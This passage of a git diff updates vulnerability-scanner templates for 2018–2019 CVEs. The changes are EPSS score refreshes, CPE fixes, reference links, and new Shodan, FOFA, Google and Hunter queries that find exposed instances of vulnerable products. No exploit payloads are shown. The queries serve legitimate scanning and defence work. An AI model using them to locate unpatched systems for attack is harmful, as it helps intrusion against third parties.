http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70715 + epss-percentile: 0.73405 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 14b26eeaf0..502607e70a 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7600 cwe-id: CWE-20 - epss-score: 0.97568 + epss-score: 0.97566 epss-percentile: 1 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index aa1cc6dda2..9c7e4cd6ad 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-7602 - epss-score: 0.97448 - epss-percentile: 0.99947 + epss-score: 0.97456 + epss-percentile: 0.99954 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 1f4589ccf7..d347ae0ded 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.81235 + epss-percentile: 0.81581 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,6 +27,7 @@ info: product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" + google-query: intitle:"yzmcms" tags: cve,cve2018,packetstorm,yzmcms,cms,xss http: diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 4296c733cd..1a19f074f3 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-7662 cwe-id: CWE-200 - epss-score: 0.00292 - epss-percentile: 0.65908 + epss-score: 0.00225 + epss-percentile: 0.60692 cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index e7a7c1694a..ea0c5bd4f4 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -25,6 +25,8 @@ info: max-request: 1 vendor: dedecms product: dedecms + fofa-query: body="dedecms" + shodan-query: http.html:"dedecms" tags: cve,cve2018,dedecms,rce http: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 736443d83a..3dcd0ed56b 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -26,12 +26,13 @@ info: cve-id: CVE-2018-8006 cwe-id: CWE-79 epss-score: 0.34776 - epss-percentile: 0.97001 + epss-percentile: 0.97108 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: activemq + shodan-query: cpe:"cpe:2.3:a:apache:activemq" tags: cve2018,cve,apache,activemq,xss http: diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index d79973fb02..851c9e01e0 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -22,12 +22,14 @@ info: cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.04526 - epss-percentile: 0.92289 + epss-percentile: 0.92473 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz + fofa-query: body="ofbiz" + shodan-query: http.html:"ofbiz" tags: cve,cve2018,apache,ofbiz,xxe http: diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index a38abc6ad5..c2250d7fb5 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: embedthis product: appweb + shodan-query: cpe:"cpe:2.3:a:embedthis:appweb" tags: cve,cve2018,appweb,auth-bypass,embedthis http: diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index cba8bb1015..17e6c6f48a 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.03177 - epss-percentile: 0.9019 + epss-percentile: 0.91151 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 4327084e4d..031c8b8b47 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-8823 cwe-id: CWE-94 epss-score: 0.24062 - epss-percentile: 0.96494 + epss-percentile: 0.96593 cpe: cpe:2.3:a:responsive_mega_menu_pro_project:responsive_mega_menu_pro:1.0.32:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 0c57ffd30b..e598e0a524 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.07018 - epss-percentile: 0.93812 + epss-percentile: 0.93949 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index a814e8ae7e..250b3b302f 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.02175 - epss-percentile: 0.89127 + epss-percentile: 0.89345 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 2f9e04ad8e..4b9aea984e 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -28,6 +28,9 @@ info: max-request: 2 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub http: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 5c01cc8049..c102db69ea 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2019-0221 cwe-id: CWE-79 - epss-score: 0.00915 - epss-percentile: 0.82479 + epss-score: 0.01096 + epss-percentile: 0.84374 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2019,cve,apache,xss,tomcat,seclists,edb variables: payload: "" diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index ae5aac529e..c652f6af37 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2019,tenable,packetstorm,struts,rce,apache variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 8cfe5d05e2..450d51d916 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: kentico product: kentico + shodan-query: cpe:"cpe:2.3:a:kentico:kentico" tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf http: diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 0c934003ec..20f33b0bd3 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2019-10092 cwe-id: CWE-79 epss-score: 0.07116 - epss-percentile: 0.9334 + epss-percentile: 0.93987 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve,cve2019,apache,htmli,injection http: diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index b71e1cd822..1cf3fb43e7 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -29,6 +29,7 @@ info: max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve,cve2019,redirect,apache,server http: diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 96ba72bba3..7df027d093 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-1010290 cwe-id: CWE-601 epss-score: 0.00215 - epss-percentile: 0.58908 + epss-percentile: 0.59555 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 94189434f2..4a739d8006 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -27,6 +27,7 @@ info: vendor: jenkins product: jenkins shodan-query: http.favicon.hash:81586312 + fofa-query: icon_hash=81586312 tags: cve,cve2019,jenkins http: diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index 380740a888..e665e9a158 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10475 cwe-id: CWE-79 - epss-score: 0.97301 - epss-percentile: 0.99859 + epss-score: 0.97319 + epss-percentile: 0.99877 cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index a15f0cd07d..ef67bb90de 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-google-maps/#developers - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + - https://github.com/VTFoundation/vulnerablewp classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-10692 cwe-id: CWE-89 - epss-score: 0.9737 - epss-percentile: 0.99889 + epss-score: 0.97291 + epss-percentile: 0.99864 cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index a69c522e03..e65cb1cb15 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.1 cve-id: CVE-2019-10717 cwe-id: CWE-22 - epss-score: 0.00409 - epss-percentile: 0.712 + epss-score: 0.00351 + epss-percentile: 0.71813 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: dotnetblogengine product: blogengine.net shodan-query: http.html:"Blogengine.net" + fofa-query: body="blogengine.net" tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine http: diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 92d6c6e83f..7ce8d1d121 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2019-10758 - epss-score: 0.97429 - epss-percentile: 0.99934 + epss-score: 0.97459 + epss-percentile: 0.99955 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -27,6 +27,8 @@ info: product: mongo-express framework: node.js shodan-query: http.title:"Mongo Express" + fofa-query: title="mongo express" + google-query: intitle:"mongo express" tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js http: diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index f09ced2a8e..e7c00106fb 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -21,13 +21,16 @@ info: cvss-score: 8.2 cve-id: CVE-2019-11248 cwe-id: CWE-862,CWE-419 - epss-score: 0.69166 - epss-percentile: 0.97712 + epss-score: 0.55625 + epss-percentile: 0.97666 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kubernetes product: kubernetes + shodan-query: http.title:"kubernetes web view" + fofa-query: title="kubernetes web view" + google-query: intitle:"kubernetes web view" tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure http: diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 0d2b1b1d75..4fd05aa3b9 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2019-11370 cwe-id: CWE-79 - epss-score: 0.1896 - epss-percentile: 0.96129 + epss-score: 0.17043 + epss-percentile: 0.96067 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: carel product: pcoweb_card_firmware shodan-query: http.html:"pCOWeb" + fofa-query: body="pcoweb" tags: cve,cve2019,pcoweb,xss,carel,edb http: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 8493550845..8b516e4f70 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: ivanti product: connect_secure + shodan-query: http.html:"welcome.cgi?p=logo" + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev http: diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 3fb5bfc10c..754a2e87d6 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11580 epss-score: 0.97441 - epss-percentile: 0.99943 + epss-percentile: 0.99946 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 470e0a109a..a5be14e8d9 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-11581 cwe-id: CWE-74 - epss-score: 0.97379 - epss-percentile: 0.99897 + epss-score: 0.9725 + epss-percentile: 0.99846 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 02d8b9f57f..b5445d9d4e 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -26,8 +26,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-11869 cwe-id: CWE-79 - epss-score: 0.00218 - epss-percentile: 0.597 + epss-score: 0.0018 + epss-percentile: 0.55101 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index a4c64269a2..b5dc0db698 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12276 cwe-id: CWE-22 - epss-score: 0.96035 - epss-percentile: 0.99446 + epss-score: 0.95661 + epss-percentile: 0.99411 cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 4d9713fdc0..aa7c64d4e5 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 - epss-score: 0.18931 - epss-percentile: 0.95811 + epss-score: 0.16359 + epss-percentile: 0.95995 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index da9fbcecdb..1700cae404 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12461 cwe-id: CWE-79 - epss-score: 0.00269 - epss-percentile: 0.6713 + epss-score: 0.0035 + epss-percentile: 0.71796 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 327f88b08f..f374f8f3ba 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -28,6 +28,8 @@ info: vendor: zyxel product: uag2100_firmware shodan-query: http.title:"ZyWall" + fofa-query: title="zywall" + google-query: intitle:"zywall" tags: cve,cve2019,zyxel,zywall,xss http: diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 3f62ff75c8..f714adf68b 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2019-12583 cwe-id: CWE-425 epss-score: 0.00481 - epss-percentile: 0.75389 + epss-percentile: 0.75875 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel product: uag2100_firmware + shodan-query: http.title:"zywall" + fofa-query: title="zywall" + google-query: intitle:"zywall" tags: cve,cve2019,zyxel,zywall,xss http: diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 20ffe994cb..12f99354c1 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12593 cwe-id: CWE-22 - epss-score: 0.11506 - epss-percentile: 0.95118 + epss-score: 0.07016 + epss-percentile: 0.93948 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -30,6 +30,7 @@ info: product: mail_server shodan-query: title:"icewarp" google-query: Powered By IceWarp 10.4.4 + fofa-query: title="icewarp server administration" tags: cve,cve2019,packetstorm,lfi,icewarp http: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 1927f86d0c..0e7cd34023 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -21,12 +21,16 @@ info: cve-id: CVE-2019-12616 cwe-id: CWE-352 epss-score: 0.01696 - epss-percentile: 0.87461 + epss-percentile: 0.87724 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.title:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve2019,cve,csrf,edb,phpmyadmin http: diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index f00aaef9f4..59b7332699 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2019-12725 cwe-id: CWE-78 epss-score: 0.96341 - epss-percentile: 0.99518 + epss-percentile: 0.99549 cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell + shodan-query: http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: cve,cve2019,packetstorm,rce,zeroshell http: diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 32221d9467..75449b86cc 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 - epss-score: 0.17333 - epss-percentile: 0.95984 + epss-score: 0.15911 + epss-percentile: 0.95954 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: livezilla product: livezilla shodan-query: http.html:LiveZilla + fofa-query: body=livezilla tags: cve,cve2019,xss,edb,packetstorm,livezilla http: diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 4a1d4341b4..22578c4557 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -27,6 +27,8 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 2599109455..77a1e47e8d 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -19,14 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12986 cwe-id: CWE-78 - epss-score: 0.97297 - epss-percentile: 0.9985 + epss-score: 0.97203 + epss-percentile: 0.99825 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve2019,cve,unauth,oast,tenable,citrix,rce http: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index b25abcb298..48dc6e03bb 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -19,14 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12987 cwe-id: CWE-78 - epss-score: 0.97297 - epss-percentile: 0.9985 + epss-score: 0.97203 + epss-percentile: 0.99825 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index 49902a9eb7..e963305f7b 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -27,6 +27,8 @@ info: vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,rce,unauth,oast,tenable,citrix http: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index e582f7f42c..5c7074430f 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12990 cwe-id: CWE-22 - epss-score: 0.92152 - epss-percentile: 0.98756 + epss-score: 0.90869 + epss-percentile: 0.98831 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: citrix product: netscaler_sd-wan shodan-query: http.title:"Citrix SD-WAN" + fofa-query: title="citrix sd-wan" + google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive http: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 5dd4626056..fd706d268b 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.8 cve-id: CVE-2019-13101 cwe-id: CWE-306 - epss-score: 0.0359 - epss-percentile: 0.9142 - cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* + epss-score: 0.06909 + epss-percentile: 0.93911 + cpe: cpe:2.3:h:dlink:dir-600m:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink - product: dir-600m_firmware + product: dir-600m tags: cve2019,cve,packetstorm,edb,dlink,router,iot http: diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 771e3d709d..79bf241156 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -14,13 +14,14 @@ info: - https://mindpalette.com/tag/natemail/ - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 - https://twitter.com/mindpalette + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-13392 cwe-id: CWE-79 - epss-score: 0.0014 - epss-percentile: 0.49585 + epss-score: 0.00127 + epss-percentile: 0.47442 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index d1cafa9db7..bf8dc2a8a4 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-13396 cwe-id: CWE-22 - epss-score: 0.02602 - epss-percentile: 0.90051 + epss-score: 0.0288 + epss-percentile: 0.9075 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-13462.yaml 